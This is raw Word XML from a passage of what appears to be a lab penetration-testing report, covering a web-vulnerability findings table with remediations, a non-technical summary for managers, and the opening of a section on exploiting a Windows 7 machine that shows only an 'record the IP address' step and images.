                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Absence of Anti-CSRF Tokens</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2338" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1C307B85" w14:textId="77777777" w:rsidR="008F6ABD" w:rsidRPr="00DF15ED" w:rsidRDefault="008F6ABD" w:rsidP="003704DF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DF15ED">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2338" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0AFF5B36" w14:textId="77777777" w:rsidR="008F6ABD" w:rsidRPr="00DF15ED" w:rsidRDefault="008F6ABD" w:rsidP="003704DF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DF15ED">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008F6ABD" w:rsidRPr="00DF15ED" w14:paraId="61593FD2" w14:textId="77777777" w:rsidTr="003704DF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2337" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="15A15A11" w14:textId="77777777" w:rsidR="008F6ABD" w:rsidRPr="00DF15ED" w:rsidRDefault="008F6ABD" w:rsidP="003704DF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DF15ED">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>F004</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2337" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A08F3C0" w14:textId="77777777" w:rsidR="008F6ABD" w:rsidRPr="00DF15ED" w:rsidRDefault="008F6ABD" w:rsidP="003704DF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DF15ED">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Missing Anti-clickjacking Header</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2338" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="747BED38" w14:textId="77777777" w:rsidR="008F6ABD" w:rsidRPr="00DF15ED" w:rsidRDefault="008F6ABD" w:rsidP="003704DF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DF15ED">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2338" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5148650B" w14:textId="77777777" w:rsidR="008F6ABD" w:rsidRPr="00DF15ED" w:rsidRDefault="008F6ABD" w:rsidP="003704DF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DF15ED">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Modern Web browsers support the Content-Security-Policy and X-Frame-Options HTTP headers. Ensure one of them is set on all web pages returned by your site/app.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008F6ABD" w:rsidRPr="00DF15ED" w14:paraId="1423986A" w14:textId="77777777" w:rsidTr="003704DF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2337" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="37F2398D" w14:textId="77777777" w:rsidR="008F6ABD" w:rsidRPr="00DF15ED" w:rsidRDefault="008F6ABD" w:rsidP="003704DF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DF15ED">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>F005</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2337" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="62969D07" w14:textId="77777777" w:rsidR="008F6ABD" w:rsidRPr="00DF15ED" w:rsidRDefault="008F6ABD" w:rsidP="003704DF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DF15ED">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Cookie No </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00DF15ED">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>HttpOnly</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00DF15ED">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> Flag</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2338" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="47130855" w14:textId="77777777" w:rsidR="008F6ABD" w:rsidRPr="00DF15ED" w:rsidRDefault="008F6ABD" w:rsidP="003704DF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DF15ED">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2338" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="40338935" w14:textId="77777777" w:rsidR="008F6ABD" w:rsidRPr="00DF15ED" w:rsidRDefault="008F6ABD" w:rsidP="003704DF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DF15ED">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Ensure that the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00DF15ED">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>HttpOnly</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00DF15ED">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> flag is set for all cookies.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008F6ABD" w:rsidRPr="00DF15ED" w14:paraId="0CC0FDD7" w14:textId="77777777" w:rsidTr="003704DF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2337" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="349ACC09" w14:textId="77777777" w:rsidR="008F6ABD" w:rsidRPr="00DF15ED" w:rsidRDefault="008F6ABD" w:rsidP="003704DF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DF15ED">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>F006</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2337" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="31925195" w14:textId="77777777" w:rsidR="008F6ABD" w:rsidRPr="00DF15ED" w:rsidRDefault="008F6ABD" w:rsidP="003704DF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DF15ED">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>In Page Banner Information Leak</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2338" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="55509293" w14:textId="77777777" w:rsidR="008F6ABD" w:rsidRPr="00DF15ED" w:rsidRDefault="008F6ABD" w:rsidP="003704DF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DF15ED">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2338" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F13FC41" w14:textId="77777777" w:rsidR="008F6ABD" w:rsidRPr="00DF15ED" w:rsidRDefault="008F6ABD" w:rsidP="003704DF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DF15ED">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Configure the server to prevent such information leaks.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="220ABF9D" w14:textId="77777777" w:rsidR="008F6ABD" w:rsidRDefault="008F6ABD" w:rsidP="00F12DCC"/>
    <w:p w14:paraId="4740CEFE" w14:textId="77777777" w:rsidR="00514F54" w:rsidRDefault="00514F54" w:rsidP="00F12DCC"/>
    <w:p w14:paraId="07FBE1EF" w14:textId="77777777" w:rsidR="00514F54" w:rsidRDefault="00514F54" w:rsidP="00F12DCC"/>
    <w:p w14:paraId="48D7B125" w14:textId="77777777" w:rsidR="00514F54" w:rsidRDefault="00514F54" w:rsidP="00F12DCC"/>
    <w:p w14:paraId="2866D5DE" w14:textId="77777777" w:rsidR="00514F54" w:rsidRDefault="00514F54" w:rsidP="00F12DCC"/>
    <w:p w14:paraId="5C3DEE1A" w14:textId="28D16397" w:rsidR="00433D87" w:rsidRPr="00433D87" w:rsidRDefault="00433D87" w:rsidP="00433D87">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc224128484"/>
      <w:r w:rsidRPr="00433D87">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Network Attack Path Diagram</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="5E591DDD" w14:textId="03E66449" w:rsidR="00514F54" w:rsidRDefault="001E329F" w:rsidP="00F12DCC">
      <w:r w:rsidRPr="00DF15ED">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251698176" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4EE4416C" wp14:editId="775566D5">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>35671</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1049230" cy="3590843"/>
            <wp:effectExtent l="19050" t="19050" r="17780" b="10160"/>
            <wp:wrapNone/>
            <wp:docPr id="1283297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55574" cy="361255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BF008C2" w14:textId="77777777" w:rsidR="00245E88" w:rsidRPr="00245E88" w:rsidRDefault="00245E88" w:rsidP="00245E88"/>
    <w:p w14:paraId="0F35BF0D" w14:textId="77777777" w:rsidR="00245E88" w:rsidRPr="00245E88" w:rsidRDefault="00245E88" w:rsidP="00245E88"/>
    <w:p w14:paraId="3BD93FDB" w14:textId="77777777" w:rsidR="00245E88" w:rsidRPr="00245E88" w:rsidRDefault="00245E88" w:rsidP="00245E88"/>
    <w:p w14:paraId="2355FA4C" w14:textId="77777777" w:rsidR="00245E88" w:rsidRPr="00245E88" w:rsidRDefault="00245E88" w:rsidP="00245E88"/>
    <w:p w14:paraId="49B18496" w14:textId="77777777" w:rsidR="00245E88" w:rsidRPr="00245E88" w:rsidRDefault="00245E88" w:rsidP="00245E88"/>
    <w:p w14:paraId="1EAE5A5C" w14:textId="77777777" w:rsidR="00245E88" w:rsidRPr="00245E88" w:rsidRDefault="00245E88" w:rsidP="00245E88"/>
    <w:p w14:paraId="5AD45976" w14:textId="77777777" w:rsidR="00245E88" w:rsidRPr="00245E88" w:rsidRDefault="00245E88" w:rsidP="00245E88"/>
    <w:p w14:paraId="7E70514C" w14:textId="77777777" w:rsidR="00245E88" w:rsidRPr="00245E88" w:rsidRDefault="00245E88" w:rsidP="00245E88"/>
    <w:p w14:paraId="31B998B1" w14:textId="77777777" w:rsidR="00245E88" w:rsidRPr="00245E88" w:rsidRDefault="00245E88" w:rsidP="00245E88"/>
    <w:p w14:paraId="4665A7B6" w14:textId="77777777" w:rsidR="00245E88" w:rsidRPr="00245E88" w:rsidRDefault="00245E88" w:rsidP="00245E88"/>
    <w:p w14:paraId="56DEDD2B" w14:textId="77777777" w:rsidR="00245E88" w:rsidRPr="00245E88" w:rsidRDefault="00245E88" w:rsidP="00245E88"/>
    <w:p w14:paraId="7169CD63" w14:textId="77777777" w:rsidR="00245E88" w:rsidRPr="00245E88" w:rsidRDefault="00245E88" w:rsidP="00245E88"/>
    <w:p w14:paraId="2FFD6634" w14:textId="77777777" w:rsidR="00245E88" w:rsidRPr="00245E88" w:rsidRDefault="00245E88" w:rsidP="00245E88"/>
    <w:p w14:paraId="59ABED80" w14:textId="77777777" w:rsidR="00245E88" w:rsidRPr="00245E88" w:rsidRDefault="00245E88" w:rsidP="00245E88"/>
    <w:p w14:paraId="63D6AAC1" w14:textId="77777777" w:rsidR="00245E88" w:rsidRPr="00245E88" w:rsidRDefault="00245E88" w:rsidP="00245E88"/>
    <w:p w14:paraId="62AC21AC" w14:textId="77777777" w:rsidR="00245E88" w:rsidRPr="00245E88" w:rsidRDefault="00245E88" w:rsidP="00245E88"/>
    <w:p w14:paraId="623BB59D" w14:textId="77777777" w:rsidR="00245E88" w:rsidRPr="00245E88" w:rsidRDefault="00245E88" w:rsidP="00245E88"/>
    <w:p w14:paraId="204992F1" w14:textId="77777777" w:rsidR="00245E88" w:rsidRDefault="00245E88" w:rsidP="00245E88"/>
    <w:p w14:paraId="7B1F5890" w14:textId="77777777" w:rsidR="00C078C8" w:rsidRDefault="00C078C8" w:rsidP="00245E88"/>
    <w:p w14:paraId="0FF49903" w14:textId="77777777" w:rsidR="00C078C8" w:rsidRDefault="00C078C8" w:rsidP="00245E88"/>
    <w:p w14:paraId="51E29A2C" w14:textId="77777777" w:rsidR="00412C92" w:rsidRPr="00412C92" w:rsidRDefault="00412C92" w:rsidP="00412C92">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc224128485"/>
      <w:r w:rsidRPr="00412C92">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>100-word non-technical summary for managers</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="272F9F90" w14:textId="24D13EC5" w:rsidR="00412C92" w:rsidRPr="00DF15ED" w:rsidRDefault="00412C92" w:rsidP="00412C92">
      <w:r w:rsidRPr="00DF15ED">
        <w:t xml:space="preserve">The security assessment revealed multiple vulnerabilities in the evaluated web application that might potentially render the system susceptible to attackers. Attackers may be able to access sensitive source code or run malicious commands on the server due to two high-risk flaws. Additionally, attackers may be able to deceive users into taking unwanted activities due to medium-risk flaws in web sites that lack security measures. Certain lower-risk problems might expose superfluous system data or make it possible to access cookies in dangerous ways. All of the problems raise the overall security risk, even though not all of them are immediately serious. The system's </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DF15ED">
        <w:t>defense</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DF15ED">
        <w:t xml:space="preserve"> will be greatly enhanced by updating the software, fortifying server configurations, and putting suggested security controls in place.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C7F8C3" w14:textId="77777777" w:rsidR="00C078C8" w:rsidRPr="00245E88" w:rsidRDefault="00C078C8" w:rsidP="00245E88"/>
    <w:p w14:paraId="557CB4C5" w14:textId="77777777" w:rsidR="00245E88" w:rsidRPr="00245E88" w:rsidRDefault="00245E88" w:rsidP="00245E88"/>
    <w:p w14:paraId="4359310F" w14:textId="77777777" w:rsidR="00245E88" w:rsidRDefault="00245E88" w:rsidP="00245E88"/>
    <w:p w14:paraId="1685053A" w14:textId="77777777" w:rsidR="00EB09E3" w:rsidRDefault="00EB09E3" w:rsidP="00245E88"/>
    <w:p w14:paraId="40EBDEF9" w14:textId="77777777" w:rsidR="00EB09E3" w:rsidRDefault="00EB09E3" w:rsidP="00245E88"/>
    <w:p w14:paraId="2E767055" w14:textId="77777777" w:rsidR="00EB09E3" w:rsidRDefault="00EB09E3" w:rsidP="00245E88"/>
    <w:p w14:paraId="39046DEF" w14:textId="77777777" w:rsidR="00EB09E3" w:rsidRDefault="00EB09E3" w:rsidP="00245E88"/>
    <w:p w14:paraId="0FA3F236" w14:textId="77777777" w:rsidR="00EB09E3" w:rsidRDefault="00EB09E3" w:rsidP="00245E88"/>
    <w:p w14:paraId="67AD252E" w14:textId="77777777" w:rsidR="00EB09E3" w:rsidRDefault="00EB09E3" w:rsidP="00245E88"/>
    <w:p w14:paraId="3A8D8ECD" w14:textId="75FCF166" w:rsidR="00EB09E3" w:rsidRDefault="00623517" w:rsidP="00623517">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc224128486"/>
      <w:r w:rsidRPr="00623517">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Exploit Windows</w:t>
      </w:r>
      <w:r w:rsidR="00E75816">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 7</w:t>
      </w:r>
      <w:r w:rsidRPr="00623517">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Machine</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="050E27DE" w14:textId="58623456" w:rsidR="007E34ED" w:rsidRPr="005B6BB3" w:rsidRDefault="007E34ED" w:rsidP="007E34ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="005B6BB3">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251700224" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0CC8425E" wp14:editId="1676D1C1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>318053</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5176299" cy="3464692"/>
            <wp:effectExtent l="0" t="0" r="5715" b="2540"/>
            <wp:wrapNone/>
            <wp:docPr id="50903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37464" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId51">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5176299" cy="3464692"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="005B6BB3">
        <w:t>Record the IP Address of Windows 7 Machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B1C15CA" w14:textId="51A5956C" w:rsidR="007E34ED" w:rsidRPr="005B6BB3" w:rsidRDefault="007E34ED" w:rsidP="007E34ED"/>
    <w:p w14:paraId="4F7CAB51" w14:textId="77777777" w:rsidR="007E34ED" w:rsidRPr="005B6BB3" w:rsidRDefault="007E34ED" w:rsidP="007E34ED"/>
    <w:p w14:paraId="7CC52075" w14:textId="77777777" w:rsidR="007E34ED" w:rsidRPr="005B6BB3" w:rsidRDefault="007E34ED" w:rsidP="007E34ED"/>
    <w:p w14:paraId="317B2722" w14:textId="77777777" w:rsidR="007E34ED" w:rsidRPr="005B6BB3" w:rsidRDefault="007E34ED" w:rsidP="007E34ED"/>
    <w:p w14:paraId="5C991C4A" w14:textId="77777777" w:rsidR="007E34ED" w:rsidRPr="005B6BB3" w:rsidRDefault="007E34ED" w:rsidP="007E34ED"/>
    <w:p w14:paraId="78DF3405" w14:textId="77777777" w:rsidR="007E34ED" w:rsidRPr="005B6BB3" w:rsidRDefault="007E34ED" w:rsidP="007E34ED"/>
    <w:p w14:paraId="25DBAEA9" w14:textId="77777777" w:rsidR="007E34ED" w:rsidRPr="005B6BB3" w:rsidRDefault="007E34ED" w:rsidP="007E34ED"/>
    <w:p w14:paraId="77C85332" w14:textId="77777777" w:rsidR="007E34ED" w:rsidRDefault="007E34ED" w:rsidP="007E34ED"/>
    <w:p w14:paraId="17DB1872" w14:textId="77777777" w:rsidR="007E34ED" w:rsidRDefault="007E34ED" w:rsidP="007E34ED"/>
    <w:p w14:paraId="433DCA35" w14:textId="77777777" w:rsidR="007E34ED" w:rsidRDefault="007E34ED" w:rsidP="007E34ED"/>
    <w:p w14:paraId="298DAA90" w14:textId="77777777" w:rsidR="007E34ED" w:rsidRDefault="007E34ED" w:rsidP="007E34ED"/>
    <w:p w14:paraId="1BFC0401" w14:textId="77777777" w:rsidR="007E34ED" w:rsidRDefault="007E34ED" w:rsidP="007E34ED"/>
    <w:p w14:paraId="5AEC8242" w14:textId="77777777" w:rsidR="007E34ED" w:rsidRDefault="007E34ED" w:rsidP="007E34ED"/>
    <w:p w14:paraId="535EF99C" w14:textId="77777777" w:rsidR="007E34ED" w:rsidRDefault="007E34ED" w:rsidP="007E34ED"/>
    <w:p w14:paraId="33D2F4AD" w14:textId="77777777" w:rsidR="007E34ED" w:rsidRPr="005B6BB3" w:rsidRDefault="007E34ED" w:rsidP="007E34ED"/>
    <w:p w14:paraId="5B2CA225" w14:textId="77777777" w:rsidR="007E34ED" w:rsidRDefault="007E34ED" w:rsidP="007E34ED"/>
    <w:p w14:paraId="5A553E61" w14:textId="77777777" w:rsidR="007E34ED" w:rsidRPr="005B6BB3" w:rsidRDefault="007E34ED" w:rsidP="007E34ED"/>
    <w:p w14:paraId="13470062" w14:textId="77777777" w:rsidR="007E34ED" w:rsidRPr="005B6BB3" w:rsidRDefault="007E34ED" w:rsidP="007E34ED"/>
    <w:p w14:paraId="25E66DB8" w14:textId="253C372D" w:rsidR="007E34ED" w:rsidRPr="005B6BB3" w:rsidRDefault="007E34ED" w:rsidP="007E34ED"/>
    <w:p w14:paraId="140BF594" w14:textId="4C21E70A" w:rsidR="007E34ED" w:rsidRPr="005B6BB3" w:rsidRDefault="007E34ED" w:rsidP="007E34ED"/>
    <w:p w14:paraId="29D8D80E" w14:textId="53FA47D4" w:rsidR="007E34ED" w:rsidRPr="005B6BB3" w:rsidRDefault="00FE551E" w:rsidP="007E34ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="005B6BB3">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251701248" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0FBC8B01" wp14:editId="2F8B524A">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>289891</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3786307" cy="3729162"/>
            <wp:effectExtent l="0" t="0" r="5080" b="5080"/>
            <wp:wrapNone/>
            <wp:docPr id="58300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00804" name=""/>
                    <pic:cNvPicPr/>
